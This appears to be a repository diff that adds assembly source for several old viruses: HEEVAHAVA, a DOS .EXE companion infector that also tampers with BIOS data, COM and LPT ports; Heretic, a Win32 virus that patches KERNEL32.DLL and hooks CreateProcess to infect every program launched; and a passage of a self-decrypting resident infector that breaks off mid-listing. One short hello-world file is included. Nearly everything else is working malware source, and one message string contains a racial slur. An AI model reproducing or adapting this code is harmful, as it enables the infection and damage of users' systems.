
@ -0,0 +1,296 @@
; HEEVAHAV.ASM -- HEEVAHAVA VIRUS
; Created with Nowhere Man's Virus Creation Laboratory v1.00/TASM
; Written by URNST KOUCH
; This is a spawning virus I decided to take to the limit,
; to step on the accelerator of the VCL, so to speak.
; HEEVAHAVA virus is a 'companion' .EXE infector which will attempt
; to infect almost 20 files anywhere on the disk every run. It will mess
; with low RAM, beep the speaker, disable COM port 1, entangle LPT1 and LPT2,
; nullify print screen and finally, when the disk is completely saturated
; with HEEVAHAVA virus it will display the msg, "Only heeva-hava's get stuck
; with the HEEVAHAVA virus!" Note: a 'heevahava' is a Pennsylvania
; Dutch pejorative. Colloquially, it was the name given to the farmhand
; given the job of holding the bull's pecker while semen was collected.
virus_type equ 2 ; Spawning Virus
is_encrypted equ 0 ; We're not encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
start label near
main proc near
mov ah,04Ah ; DOS resize memory function
mov bx,[finish - start / 0282h] ; BX holds # of para.
int 21h
mov sp,(finish - start) + 01100h ; Change top of stack
mov si,offset spawn_name ; SI points to true filename
int 02Eh ; DOS execution back-door
push ax ; Save return value for later
mov ax,cs ; AX holds code segment
mov ds,ax ; Restore data segment
mov es,ax ; Restore extra segment
mov cx,0013h ; Do 19 infections
search_loop: push cx ; Save CX
call search_files ; Find and infect a file
pop cx ; Restore CX
loop search_loop ; Repeat until CX is 0
mov dx,0064h ; First argument is 100
push es ; Save ES
mov ax,040h ; Set extra segment to 040h
mov es,ax ; (ROM BIOS)
mov word ptr es:[013h],dx ; Store new RAM ammount
pop es ; Restore ES
mov cx,0005h ; First argument is 5
jcxz beep_end ; Exit if there are no beeps
mov ax,0E07h ; BIOS display char., BEL
beep_loop: int 010h ; Beep
loop beep_loop ; Beep until --CX = 0
beep_end:
push es ; Save ES
mov ax,050h ; Set the extra segement to
mov es,ax ; the BIOS area
mov byte ptr [0000h],1 ; Set print screen flag to
pop es ; "printing," restore ES
mov si,0001h ; First argument is 1
push es ; Save ES
xor ax,ax ; Set the extra segment to
mov es,ax ; zero (ROM BIOS)
shl si,1 ; Convert to word index
mov word ptr [si + 03FEh],0 ; Zero COM port address
pop es ; Restore ES
mov bx,0001h ; First argument is 1
mov si,0002h ; Second argument is 2
push es ; Save ES
xor ax,ax ; Set the extra segment to
mov es,ax ; zero (ROM BIOS)
shl bx,1 ; Convert to word index
shl si,1 ; Convert to word index
mov ax,word ptr [bx + 0407h]; Zero COM port address
xchg word ptr [si + 0407h],ax; Put first value in second,
mov word ptr [bx + 0407h],ax; and second value in first!
pop es ; Restore ES
call infected_all
or ax,ax ; Did the function return zero?
je strt00 ; If equal, do effect
jmp end00 ; Otherwise skip over it
strt00: mov si,offset data00 ; SI points to data
mov ah,0Eh ; BIOS display char. function
display_loop: lodsb ; Load the next char. into AL
or al,al ; Is the character a null?
je disp_strnend ; If it is, exit
int 010h ; BIOS video interrupt
jmp short display_loop ; Do the next character
disp_strnend:
end00: pop ax ; AL holds return value
mov ah,04Ch ; DOS terminate function
int 021h
main endp
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
mov dx,offset root ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
mov dx,offset all_files ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
mov dx,offset up_dir ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
mov dx,offset exe_mask ; DX points to "*.EXE"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
exe_mask db "*.EXE",0 ; Mask for all .EXE files
traverse endp
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov di,bx ; DI points to the DTA
lea si,[di + 01Eh] ; SI points to file name
mov dx,si ; DX points to file name, too
mov di,offset spawn_name + 1; DI points to new name
xor ah,ah ; AH holds character count
transfer_loop: lodsb ; Load a character
or al,al ; Is it a NULL?
je transfer_end ; If so then leave the loop
inc ah ; Add one to the character count
stosb ; Save the byte in the buffer
jmp short transfer_loop ; Repeat the loop
transfer_end: mov byte ptr [spawn_name],ah; First byte holds char. count
mov byte ptr [di],13 ; Make CR the final character
mov di,dx ; DI points to file name
xor ch,ch ;
mov cl,ah ; CX holds length of filename
mov al,'.' ; AL holds char. to search for
repne scasb ; Search for a dot in the name
mov word ptr [di],'OC' ; Store "CO" as first two bytes
mov byte ptr [di + 2],'M' ; Store "M" to make "COM"
mov byte ptr [set_carry],0 ; Assume we'll fail
mov ax,03D00h ; DOS open file function, r/o
int 021h
jnc infection_done ; File already exists, so leave
mov byte ptr [set_carry],1 ; Success -- the file is OK
mov ah,03Ch ; DOS create file function
mov cx,00100111b ; CX holds file attributes (all)
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,finish - start ; CX holds virus length
mov dx,offset start ; DX points to start of virus
int 021h
mov ah,03Eh ; DOS close file function
int 021h
infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed
ret ; Return to caller
spawn_name db 12,12 dup (?),13 ; Name for next spawn
set_carry db ? ; Set-carry-on-exit flag
infect_file endp
infected_all proc near
#if virus_type eq 0
mov al,byte ptr [di + set_carry]
else
mov al,byte ptr [set_carry] ; AX holds success value
#endif
cbw ; Sign-extend AL into AX
ret ; Return to caller
infected_all endp
data00 db 7,7,7,7,"Only heeva-hava's get stuck with THE HEEVAHAVA virus!",13,10,0
vcl_marker db "HEEVA[VCL]",0 ; VCL creation marker
finish label near
code ends
end main

10
MSDOS/Virus.MSDOS.Unknown.hello.asm Normal file
View File

@ -0,0 +1,10 @@
; +-------------------------------------------------------------+ ;
; | Sample hello world program for use with the Magic Assembler | ;
; +-------------------------------------------------------------+ ;
mov ah,09
mov dx,offset(hello)
int 21
mov ax,4c00
int 20
hello db 'Hello, world!$'

882
MSDOS/Virus.MSDOS.Unknown.heretic.asm Normal file
View File

@ -0,0 +1,882 @@
;
; SYNOPSIS
;
; Heretic - A Microsoft Windows 32 virus
;
; AUTHOR
;
; Memory Lapse, [NOP]
; formerly of Phalcon/Skism
;
; ABSTRACT
;
; This virus works under all beta versions of Windows 9x, and Windows NT 4.0.
; Under a Win32s environment, the virus will fail since the kernel doesn't
; physically export any useable API. Parsing the import table of the host image
; for GetProcAddress and GetModuleHandle should do the trick.
;
; NOTES
;
; Finally after seven months (including a four month hiatus for university),
; I've finally finished this virus.
;
; Ideally when the kernel is infected, the object the virus extends
; (typically .reloc) should have its flags with IMAGE_SCN_MEM_WRITE turned off.
; This will prevent in-memory patching by antivirus software. Heretic does
; not do this. At least not yet.
;
; Useful reading material: Microsoft Platform, SDK, and DDK Documentation
;
; Greets to priest, h8, lookout, virogen and johnny panic.
;
.386
locals
.model flat, stdcall
.code
.radix 16
include heretic.inc
CRC_POLY equ 0EDB88320
CRC_INIT equ 0FFFFFFFF
crc macro string
crcReg = CRC_INIT
irpc _x,
ctrlByte = '&_x&' xor (crcReg and 0ff)
crcReg = crcReg shr 8
rept 8
ctrlByte = (ctrlByte shr 1) xor (CRC_POLY * (ctrlByte and 1))
endm
crcReg = crcReg xor ctrlByte
endm
dd crcReg
endm
MARKER equ "DOS lives somewhere in time"
org 0
start: push L offset host - start ;location of old entry point
ddOldEntryPoint = dword ptr $ - 4
pushfd ;save state
pushad
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta - start
;thanks vg!
db 81,0edh ;sub ebp,unsignedlong
ddEntryPoint dd 0
add [esp+24],ebp ;return address of host
mov edi,[esp+28] ;get a "random" pointer from stack
and edi,0FFFF0000 ;mask off bottom word
call try
catch: mov esp,[esp+8] ;get pointer to our stack-based
; exception record
jmp finally ;and return to host
try: push dword ptr fs:[0] ;this is our try { } block
mov fs:[0],esp ;create stack-based exception record
.repeat
dec edi ;move back a byte
lea eax,[edi-MAGIC] ;thanks h8!
cmp [edi],eax ;match? then we've found the kernel
.until zero?
mov esi,[eax+exe_str.pe_offset]
add esi,eax ;traverse PE header and find
; Export Data Directory Table
mov ebp,[esi+pe_str.export_tbl]
add ebp,eax ;RVA -> absolute
push eax
push [ebp+edt_str.edt_ord_base]
mov ebx,[ebp+edt_str.edt_ord_rva]
mov edi,[ebp+edt_str.edt_name_rva]
mov ebp,[ebp+edt_str.edt_addr_rva]
add ebx,eax ;adjust ordinal table pointer
add edi,eax ;adjust name pointer table pointer
add ebp,eax ;adjust address pointer table pointer
push ebp ;we save these values onto the stack
push eax ; so we can free up registers
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta
push ebp
; on entry:
; [esp] : delta offset
; [esp+4] : image base
; [esp+8] : address pointer table
; [esp+0c] : ordinal base
; ebx - ordinal table
; esi - pointer to our list of apis
; edi - name pointer table
lea esi,[ebp+name_ptr_api]
mov ecx,1
mov edx,(name_ptr_api_end - name_ptr_api) / 4
top: push edx
push esi
mov esi,[edi] ;calculate absolute offset of
add esi,[esp+0c] ; name pointer (image base)
mov edx,CRC_INIT
lup: lodsb
or al,al ;termination token? then quit
jz chkCRC
xor dl,al
mov al,8
.repeat ;perform CRC-32 on string
shr edx,1 ;thanks jp!
.if carry?
xor edx,CRC_POLY
.endif
dec al
.until zero?
jmp lup
chkCRC: pop esi
push edi
mov ebp,ecx
shl ebp,1 ;convert count into word index
movzx eax,word ptr [ebx+ebp] ;calculate ordinal index
sub eax,[esp+14] ;relative to ordinal base
shl eax,2 ;convert ordinal into dword index
mov ebp,eax
mov edi,[esp+10]
add eax,edi ;calculate offset
mov edi,[edi+ebp] ;RVA of API (dereference said offset)
add edi,[esp+0c] ;convert to absolute offset
mov ebp,[esp+8]
cmp edx,CRC_POLY ;CreateProcessA?
org $ - 4
crc
.if zero?
mov [ebp+lpCreateProcessA],eax ;hook it
mov [ebp+CreateProcessA],edi
.endif
cmp edx,CRC_POLY ;or CreateProcessW?
org $ - 4
crc
.if zero?
mov [ebp+lpCreateProcessW],eax ;hook it
mov [ebp+CreateProcessW],edi
.endif
cmp edx,[esi] ;or an API the virus uses?
.if zero?
mov [esi+(name_ptr_api_end - name_ptr_api)],edi
lodsd ;update pointer
dec dword ptr [esp+4] ;decrement our API count
.endif
pop edi
next: pop edx
add edi,4 ;next API
inc ecx ;remember displacement
or edx,edx ;no more names to parse?
jnz top
pop ebp ;restore delta offset
add esp,0c ;clear stack
call [ebp+GlobalAlloc], \ ;allocate memory for global structure
GMEM_FIXED, \
L size vir_str
mov edi,eax
pop [edi+vir_str.lpKernelBase]
call kernel ;attempt to infect the kernel
call [ebp+GlobalFree], \ ;release global structure resources
edi
finally:pop dword ptr fs:[0] ;this is our finally { } block
pop eax ;trash exception handler address
;low and behold, the stack is restored
popad
popfd
ret
db '[nop] 4 life.. lapse, vg and jp own you! :)'
infect: mov [edi+vir_str.ddError],TRUE ;assume an error occurred
call [ebp+GetFileAttributesA], \
[edi+vir_str.lpFileName]
mov [edi+vir_str.ddFilterAttributes],eax
inc eax
jz exit
call [ebp+SetFileAttributesA], \ ;strip file attributes
[edi+vir_str.lpFileName], \
FILE_ATTRIBUTE_NORMAL
or eax,eax ;error? possibly a r/o disk?
jz exit
call [ebp+CreateFileA], \
[edi+vir_str.lpFileName], \
GENERIC_READ or GENERIC_WRITE, \
FILE_SHARE_NOTSHARED, \
NULL, \
OPEN_EXISTING, \
FILE_ATTRIBUTE_NORMAL, \
NULL
mov [edi+vir_str.hFile],eax ;if we don't get a valid file
inc eax ;descriptor (ie. an invalid handle),
jz exitChmod ;quit processing
lea eax,[edi+vir_str.ddLastWriteTime]
lea ecx,[edi+vir_str.ddLastAccessTime]
lea edx,[edi+vir_str.ddCreationTime]
call [ebp+GetFileTime], \ ;save file timestamps
[edi+vir_str.hFile], \
edx, \
ecx, \
eax
call [ebp+CreateFileMappingA], \ ;create a mmap object
[edi+vir_str.hFile], \
NULL, \
PAGE_READONLY, \
L 0, \
L 0, \
NULL
or eax,eax
jz exitTime
mov [edi+vir_str.hFileMappingObject],eax
call [ebp+MapViewOfFile], \ ;view the file in our address space
[edi+vir_str.hFileMappingObject], \
FILE_MAP_READ, \
L 0, \
L 0, \
L 0
or eax,eax
jz exitCloseMap
mov [edi+lpBaseAddress],eax
cmp word ptr [eax],IMAGE_DOS_SIGNATURE
jnz exitUnmap ;some sort of executable?
mov esi,eax
add esi,[eax+exe_str.pe_offset] ;seek to NT header
push eax
call [ebp+IsBadCodePtr], \ ;can we read the memory at least?
esi ;potentially not a Windows file?
or eax,eax
pop eax
jnz exitUnmap
cmp dword ptr [esi],IMAGE_NT_SIGNATURE
jnz exitUnmap ;PE file?
cmp [esi+pe_str.timestamp],CRC_POLY
org $ - 4
crc MARKER
jz exitUnmap
lea eax,[ebp+infectKernel]
cmp [edi+vir_str.lpInfectMethod],eax;attempting to infect KERNEL32.DLL?
.if !zero?
test [esi+pe_str.flags],IMAGE_FILE_DLL
jnz exitUnmap ;and not a runtime library?
.endif
call getLastObjectTable
mov eax,[ebx+obj_str.obj_psize]
add eax,[ebx+obj_str.obj_poffset]
add eax,(_end - start) ;calculate maximum infected file size
mov ecx,[esi+pe_str.align_file]
call align
mov [edi+vir_str.ddFileSizeInfected],eax
call [ebp+UnmapViewOfFile], \
[edi+vir_str.lpBaseAddress]
call [ebp+CloseHandle], \
[edi+vir_str.hFileMappingObject]
call [ebp+CreateFileMappingA], \ ;reopen and extend mmap file
[edi+vir_str.hFile], \
NULL, \
PAGE_READWRITE, \
L 0, \
[edi+vir_str.ddFileSizeInfected], \
NULL
mov [edi+vir_str.hFileMappingObject],eax
call [ebp+MapViewOfFile], \
[edi+vir_str.hFileMappingObject], \
FILE_MAP_WRITE, \
L 0, \
L 0, \
L 0
mov [edi+vir_str.lpBaseAddress],eax
add eax,[eax+exe_str.pe_offset]
mov esi,eax
call getLastObjectTable
mov eax,[ebx+obj_str.obj_rva] ;set new entry point if an EXE
add eax,[ebx+obj_str.obj_psize] ; or set hooks if kernel32.dll
call [edi+vir_str.lpInfectMethod]
push edi
push esi
mov edi,[edi+vir_str.lpBaseAddress]
add edi,[ebx+obj_str.obj_poffset]
add edi,[ebx+obj_str.obj_psize]
lea esi,[ebp+start]
mov ecx,(_end - start)
cld
rep movsb ;copy virus
pop esi
pop eax
xchg eax,edi
sub eax,[edi+vir_str.lpBaseAddress] ;new psize = old psize + (_end - start)
sub eax,[ebx+obj_str.obj_poffset]
mov ecx,[esi+pe_str.align_file]
call align ;calculate new physical size
mov [ebx+obj_str.obj_psize],eax
mov eax,[ebx+obj_str.obj_vsize]
add eax,(_end - start)
mov ecx,[esi+pe_str.align_obj]
call align ;calculate potential new virtual size
cmp eax,[ebx+obj_str.obj_psize] ;if new physical size > new virtual size
.if carry?
mov eax,[ebx+obj_str.obj_psize] ;then let the virtual size = physical size
.endif
mov [ebx+obj_str.obj_vsize],eax
add eax,[ebx+obj_str.obj_rva]
cmp eax,[esi+pe_str.size_image] ;infected host increased in image size?
.if !carry?
mov [esi+pe_str.size_image],eax
.endif
mov [esi+pe_str.timestamp],CRC_POLY
org $ - 4
crc MARKER
or [ebx+obj_str.obj_flags],IMAGE_SCN_CNT_INITIALIZED_DATA or IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
lea eax,[ebp+szImageHlp]
call [ebp+LoadLibraryA], \ ;load image manipulation library
eax
or eax,eax
.if !zero?
push eax ;(*) argument for FreeLibrary()
lea ecx,[ebp+szChecksumMappedFile]
call [ebp+GetProcAddress], \ ;get address of image checksum api
eax, \
ecx
or eax,eax
.if !zero?
lea ecx,[esi+pe_str.pe_cksum]
lea edx,[edi+vir_str.ddBytes]
call eax, \ ;calculate checksum
[edi+vir_str.lpBaseAddress], \
[edi+vir_str.ddFileSizeInfected], \
edx, \
ecx
.endif
call [ebp+FreeLibrary] ;argument is set at (*)
.endif
mov [edi+vir_str.ddError],FALSE ;no errors!
exitUnmap:
call [ebp+UnmapViewOfFile], \ ;unmap the view
[edi+vir_str.lpBaseAddress]
exitCloseMap:
call [ebp+CloseHandle], \ ;remove mmap from our address space
[edi+vir_str.hFileMappingObject]
exitTime:
lea eax,[edi+vir_str.ddLastWriteTime]
lea ecx,[edi+vir_str.ddLastAccessTime]
lea edx,[edi+vir_str.ddCreationTime]
call [ebp+SetFileTime], \ ;restore file time
[edi+vir_str.hFile], \
edx, \
ecx, \
eax
call [ebp+CloseHandle], \ ;close the file
[edi+vir_str.hFile]
exitChmod:
call [ebp+SetFileAttributesA], \ ;restore file attributes
[edi+vir_str.lpFileName], \
[edi+vir_str.ddFilterAttributes]
exit: ret ;return to caller
kernel: call [ebp+GlobalAlloc], \ ;allocate memory for source buffer
GMEM_FIXED, \
_MAX_PATH
mov [edi+vir_str.lpSrcFile],eax
call [ebp+GetSystemDirectoryA], \ ;store %sysdir% in source buffer
eax, \
_MAX_PATH
call [ebp+GlobalAlloc], \ ;allocate memory for destination buffer
GMEM_FIXED, \
_MAX_PATH
mov [edi+vir_str.lpDstFile],eax
call [ebp+GetWindowsDirectoryA], \ ;store %windir% in destination buffer
eax, \
_MAX_PATH
lea eax,[ebp+szKernel]
call [ebp+lstrcatA], \ ;*lpSrcFile = %sysdir%\kernel32.dll
[edi+vir_str.lpSrcFile], \
eax
lea eax,[ebp+szKernel]
call [ebp+lstrcatA], \ ;*lpDstFile = %windir%\kernel32.dll
[edi+vir_str.lpDstFile], \
eax
call [ebp+CopyFileA], \
[edi+vir_str.lpSrcFile], \ ;%sysdir%\kernel32.dll
[edi+vir_str.lpDstFile], \ ; -> %windir%\kernel32.dll
FALSE
lea eax,[ebp+infectKernel]
mov [edi+lpInfectMethod],eax ;we're trying to infect the kernel
mov eax,[edi+vir_str.lpDstFile]
mov [edi+vir_str.lpFileName],eax
call infect
.if [edi+vir_str.ddError] == FALSE
lea eax,[ebp+szSetupApi]
call [ebp+LoadLibraryA], \
eax
or eax,eax ;if LoadLibrary fails, explicitly write
.if zero? ;to WININIT.INI (Windows 95)
lea eax,[ebp+szWinInitFile] ;delete the original kernel
push eax
push [edi+vir_str.lpSrcFile]
lea eax,[ebp+szKeyName]
push eax
lea eax,[ebp+szAppName]
push eax
call [ebp+WritePrivateProfileStringA]
lea eax,[ebp+szWinInitFile] ;move our patched kernel
push eax
push [edi+vir_str.lpDstFile]
push [edi+vir_str.lpSrcFile]
lea eax,[ebp+szAppName]
push eax
call [ebp+WritePrivateProfileStringA]
.else
push eax ;(*) argument for FreeLibrary
lea ebx,[ebp+szSetupInstallFileExA] ;fetch address of API from this DLL
call [ebp+GetProcAddress], \
eax, \
ebx
or eax,eax
.if !zero?
lea ebx,[edi+ddBytes]
call eax, \ ;move patched kernel
NULL, \ ;NT->delay until next reboot
NULL, \ ; modified MoveFileEx behaviour?
[edi+vir_str.lpDstFile], \ ;98->WININIT.INI
NULL, \
[edi+vir_str.lpSrcFile], \
SP_COPY_SOURCE_ABSOLUTE or SP_COPY_DELETESOURCE, \
NULL, \
NULL, \
ebx
.endif
mov esi,eax
call [ebp+FreeLibrary]
mov eax,esi
.endif
or eax,eax
.if zero?
mov [edi+vir_str.ddError],TRUE
.endif
.endif
.if [edi+vir_str.ddError] == TRUE
call [ebp+DeleteFileA], \ ;delete %windir%\kernel32.dll if
[edi+vir_str.lpFileName] ; an error infecting or moving
.endif
call [ebp+GlobalFree], \ ;deallocate destination buffer
[edi+vir_str.lpDstFile]
call [ebp+GlobalFree], \ ;deallocate source buffer
[edi+vir_str.lpSrcFile]
ret
infectKernel:
xchg eax,ecx
movzx eax,[esi+pe_str.size_NThdr]
add eax,esi
add eax,offset pe_str.majik
mov edx,0
lpCreateProcessA = dword ptr $ - 4
sub edx,[edi+vir_str.lpKernelBase]
@@lup: cmp [eax+obj_str.obj_rva],edx ;was the API in the previous object?
ja @@next
add eax,size obj_str ;next object
jmp @@lup
@@next: sub eax,size obj_str ;seek back to export object
push L offset hookCreateProcessA - start
call trapAPI
mov edx,0
lpCreateProcessW = dword ptr $ - 4
sub edx,[edi+vir_str.lpKernelBase]
push L offset hookCreateProcessW - start
call trapAPI
ret
infectEXE:
mov [ebp+ddEntryPoint],eax
xchg eax,[esi+pe_str.rva_entry]
mov [ebp+ddOldEntryPoint],eax
ret
trapAPI:push ebx
push ecx
mov ebx,[eax+obj_str.obj_poffset]
sub ebx,[eax+obj_str.obj_rva]
add ebx,[edi+vir_str.lpBaseAddress]
add ebx,edx
add ecx,[esp+0c]
mov [ebx],ecx
pop ecx
pop ebx
ret 4
align: xor edx,edx
add eax,ecx
dec eax
div ecx
mul ecx
ret
getLastObjectTable:
movzx eax,[esi+pe_str.num_obj]
cdq
mov ecx,L size obj_str
dec eax
mul ecx
movzx edx,[esi+pe_str.size_NThdr]
add eax,edx
add eax,esi
add eax,offset pe_str.majik ;seek to last object table
xchg eax,ebx
ret
;on entry:
; [esp] : return address to caller
; [esp+4] -> [esp+28] : registers
; [esp+2c] : return address to process
; [esp+34] : commandline
hookInfectUnicode:
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta
mov edi,[esp+34]
call [ebp+WideCharToMultiByte], \ ;find out how many bytes to allocate
CP_ACP, \ ; ANSI code page
L 0, \ ; no composite/unmapped characters
edi, \ ; lpWideCharStr
L -1, \ ; calculate strlen(lpWideCharStr)+1
NULL, \ ; no buffer
L 0, \ ; tell us how many bytes to allocate
NULL, \ ; ignore unmappable characters
NULL ; don't tell us about problems
or eax,eax ;no bytes can be converted?
jz hookInfectError ;then bomb out.
push eax ;(*)
call [ebp+GlobalAlloc], \ ;allocate enough memory for the
GMEM_FIXED, \ ; converted UNICODE string
eax
or eax,eax ;any memory available?
pop ecx ;(*)
jz hookInfectError
mov esi,eax
mov edi,[esp+34]
call [ebp+WideCharToMultiByte], \ ;UNICODE -> ANSI conversion
CP_ACP, \ ; ANSI code page
L 0, \ ; no composite/unmappable characters
edi, \ ; lpWideCharStr
L -1, \ ; calculate strlen(lpWideCharStr)+1
esi, \ ; destination buffer for ANSI characters
ecx, \ ; size of destination buffer
NULL, \ ; ignore unmappable characters
NULL ; don't tell us about problems
jmp hookInfectDispatch
;on entry:
; [esp] : return address to caller
; [esp+4] -> [esp+28] : registers
; [esp+2c] : return address to process
; [esp+34] : commandline
hookInfectAnsi:
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta
mov edi,[esp+34] ;get the filename
call [ebp+lstrlenA], \ ;calculate string length
edi ; (not including null terminator)
or eax,eax ;zero length?
jz hookInfectError
inc eax ;include null terminator
call [ebp+GlobalAlloc], \ ;allocate some memory for the copy
GMEM_FIXED, \
eax
or eax,eax ;no memory?
jz hookInfectError
mov esi,eax
call [ebp+lstrcpyA], \ ;*edi -> *esi
esi, \
edi
hookInfectDispatch:
push esi ;(*) argument for GlobalFree
call [ebp+GlobalAlloc], \ ;instantiate our global structure
GMEM_FIXED, \
L size vir_str
or eax,eax ;fatal error if no memory
jz hookInfectErrorFree
mov edi,eax
mov [edi+vir_str.lpFileName],esi
mov [edi+vir_str.ddError],FALSE ;assume no parsing fix-ups required
lodsb
cmp al,'"'
.if zero?
mov [edi+vir_str.lpFileName],esi
mov [edi+vir_str.ddError],TRUE ;parsing fix-ups required
.endif
hookInfectParse:
lodsb ;get a byte
.if [edi+vir_str.ddError] == TRUE ;need a fix-up?
cmp al,'"' ;'"' is our terminator
jnz hookInfectParse
.else ;no fix-up required
cmp al,' ' ;' ' or \0 is our terminator
jz hookInfectParsed
or al,al
jnz hookInfectParse
.endif
hookInfectParsed:
mov byte ptr [esi-1],NULL ;null terminate string
lea eax,[ebp+infectEXE] ;we're infecting a non-kernel32 executable
mov [edi+vir_str.lpInfectMethod],eax
call infect
call [ebp+GlobalFree], \ ;deallocate global structure
edi
hookInfectErrorFree:
call [ebp+GlobalFree] ;deallocate lpFileName
hookInfectError:
ret
hookCreateProcessW:
push CRC_POLY
CreateProcessW = dword ptr $ - 4
hookUnicode:
pushfd
pushad
call hookInfectUnicode
popad
popfd
ret
hookCreateProcessA:
push CRC_POLY
CreateProcessA = dword ptr $ - 4
hookAnsi:
pushfd
pushad
call hookInfectAnsi
popad
popfd
ret
className db '[Heretic] by Memory Lapse',0
message db 'For my thug niggaz.. uptown baby, uptown.',0
szKernel db '\KERNEL32.DLL',0
szImageHlp db 'IMAGEHLP',0
szChecksumMappedFile db 'CheckSumMappedFile',0
szSetupApi db 'SETUPAPI',0
szSetupInstallFileExA db 'SetupInstallFileExA',0
szWinInitFile db 'WININIT.INI',0
szAppName db 'Rename',0
szKeyName db 'NUL',0
name_ptr_api:
ddCloseHandle: crc
ddCopyFileA: crc
ddCreateFileA: crc
ddCreateFileMappingA: crc
ddDeleteFileA: crc
ddFreeLibrary: crc
ddGetFileAttributesA: crc
ddGetFileTime: crc
ddGetProcAddress: crc
ddGetSystemDirectoryA: crc
ddGetWindowsDirectoryA: crc
ddGlobalAlloc: crc
ddGlobalFree: crc
ddIsBadCodePtr: crc
ddLoadLibraryA: crc
ddMapViewOfFile: crc
ddSetFileAttributesA: crc
ddSetFileTime: crc
ddUnmapViewOfFile: crc
ddWideCharToMultiByte: crc
ddWritePrivateProfileStringA: crc
ddlstrcatA: crc
ddlstrcpyA: crc
ddlstrlenA: crc
name_ptr_api_end:
; absolute offsets of desired API
CloseHandle dd 0
CopyFileA dd 0
CreateFileA dd 0
CreateFileMappingA dd 0
DeleteFileA dd 0
FreeLibrary dd 0
GetFileAttributesA dd 0
GetFileTime dd 0
GetProcAddress dd 0
GetSystemDirectoryA dd 0
GetWindowsDirectoryA dd 0
GlobalAlloc dd 0
GlobalFree dd 0
IsBadCodePtr dd 0
LoadLibraryA dd 0
MapViewOfFile dd 0
SetFileAttributesA dd 0
SetFileTime dd 0
UnmapViewOfFile dd 0
WideCharToMultiByte dd 0
WritePrivateProfileStringA dd 0
lstrcatA dd 0
lstrcpyA dd 0
lstrlenA dd 0
_end:
host: call MessageBoxA, \
NULL, \
L offset lpText, \
L offset lpCaption, \
L 0 ;MB_OK
call ExitProcess, \
L 0
.data
lpCaption db 'Memory Lapse has something to say..',0
lpText db 'Hello World!',0
end start

901
MSDOS/Virus.MSDOS.Unknown.hh&h.asm Normal file
View File

@ -0,0 +1,901 @@
CODE segment para public 'code'
assume cs:code,ds:code,es:nothing,ss:nothing
org 100h
egy equ 1 ; one
dma equ 0b0h
atvar equ 300 ; at paramaeter
xtvar equ 1 ; xt parameter
suruseg equ 255 ; density
idotartalek equ 18*30 ; time delay
start: db 0e9h,0,0
;##################### Initialization ######################
resid: push ax
mov cx,offset memory - offset begin ;#### decoding ####
mov bx,ds:[101h]
add bx,103h+(offset begin-offset resid)
jhg1: xor byte ptr [bx],0
inc bx
loop jhg1
begin: sub bx,(offset begin-offset resid)+(offset memory - offset begin)
mov cs:[0feh],bx
mov ax,[bx+(offset eltarol-offset resid)]
mov cl,[bx+(offset eltarol-offset resid)+2]
mov ds:[100h],ax
mov ds:[102h],cl
mov cx,0b800h
mov ah,15
push bx
int 10h
pop bx
cmp al,7
jne rety
mov ch,0b0h
rety: mov [bx+(offset ruut - offset resid)+1],cx
mov word ptr [bx+(offset counter-offset resid)],idotartalek
mov byte ptr [bx+(offset jammed-offset resid)+1],al
mov byte ptr [bx+(offset vanesik-offset resid)],0
xor ax,ax
mov ds,ax
cmp word ptr ds:[130h],4142h
je zipp
mov ds:[130h],4142h
mov ax,cs
dec ax
mov ds,ax
mov ax,ds:[3]
sub ax,180h
mov ds:[3],ax
add ax,ds:[1]
mov es,ax
push cs
pop ds
